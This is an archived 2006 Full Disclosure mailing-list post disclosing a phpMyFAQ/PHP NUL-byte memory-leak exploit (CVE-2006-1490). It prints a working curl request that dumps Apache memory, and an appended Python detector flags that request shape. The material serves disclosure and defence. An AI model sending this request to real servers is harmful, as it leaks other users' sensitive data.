Full Disclosure mailing list archives
phpmyfaq exploit using PHP bug, CVE-2006-1490
From: Tonu Samuel <tonu () jes ee>
Date: Fri, 1 Dec 2006 16:57:41 +0200
Long time ago I made unnecessary noise about a PHP zeroday. I expected it to be maybe much more dangerous than it appeared to be at the end. There was a lot of discussion and one of the main points of consensus was that this bug is not exploitable in the real world because no one is using those vulnerable functions. This bug was originally found using phpmyfaq software and a wrong assumption was made about the wideness of the problem. Anyway, now half a year later it is time to show the exploit:

curl "http://vulnerablehost/phpmyfaq/admin/index.php" -D - -d "faqusername=%00VERYLONGSTRINGHEREEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"

The longer the input you provide, the longer the memory dump you get. Works if PHP is unpatched AND phpmyfaq is older than 1.6.0. The memory dump you get is part of apache memory and often contains sensitive information from other served pages and contexts.

To make it clear - this is NOT the fault of the phpmyfaq people at all. Even more, they made a workaround within an hour after I contacted them and urged users to upgrade. Just phpmyfaq appears to be one popular software which is easily findable by Google and this was the software where the initial discovery was made. PHP people knew about the problem but ignored it for long enough for it to be discovered independently of them.

Tõnu

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
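Detection-side counterpart to the request shown in the post, added here and not part of the original message: it URL-decodes a captured POST body and reports every parameter value carrying an embedded NUL byte (%00), flagging the leading-NUL-plus-long-string shape sent to faqusername. It generalises to any parameter name; the sample bodies, the `extra` parameter and the length threshold are constructed for the example.

```python
"""Flag HTTP POST bodies whose parameter values carry an embedded NUL byte (%00),
the request shape from the phpMyFAQ / CVE-2006-1490 post above.

Added example, not code from the post or from phpMyFAQ; sample bodies are constructed.
"""
from urllib.parse import parse_qsl

# Constructed threshold: a NUL-prefixed value longer than this is treated as
# the "long string -> long memory dump" pattern rather than a stray control byte.
LONG_VALUE = 32


def inspect_body(body: str) -> list[dict]:
    """Return one finding per parameter value that contains a NUL byte.

    parse_qsl decodes %00 to '\\x00'; keep_blank_values keeps empty fields so
    parameter positions are not silently dropped.
    """
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        if "\x00" not in value:
            continue
        findings.append({
            "param": name,
            "leading_nul": value.startswith("\x00"),
            "length": len(value),
            "long": len(value) > LONG_VALUE,
        })
    return findings


def is_suspicious(body: str) -> bool:
    """True when any value starts with a NUL byte and exceeds LONG_VALUE."""
    return any(f["leading_nul"] and f["long"] for f in inspect_body(body))


# Constructed sample bodies; the first mirrors the curl payload from the post.
# 'extra' is a made-up second field, not a phpMyFAQ parameter.
SAMPLE_BODIES = [
    "faqusername=%00VERYLONGSTRINGHEREEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE&extra=1",
    "faqusername=alice&extra=1",
    "faqusername=bob%00",  # NUL present but short: reported, not flagged
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(is_suspicious(body), inspect_body(body))
```

Run over decoded request bodies from a WAF or reverse-proxy log; a raw access log without bodies will not expose the POST parameters this checks.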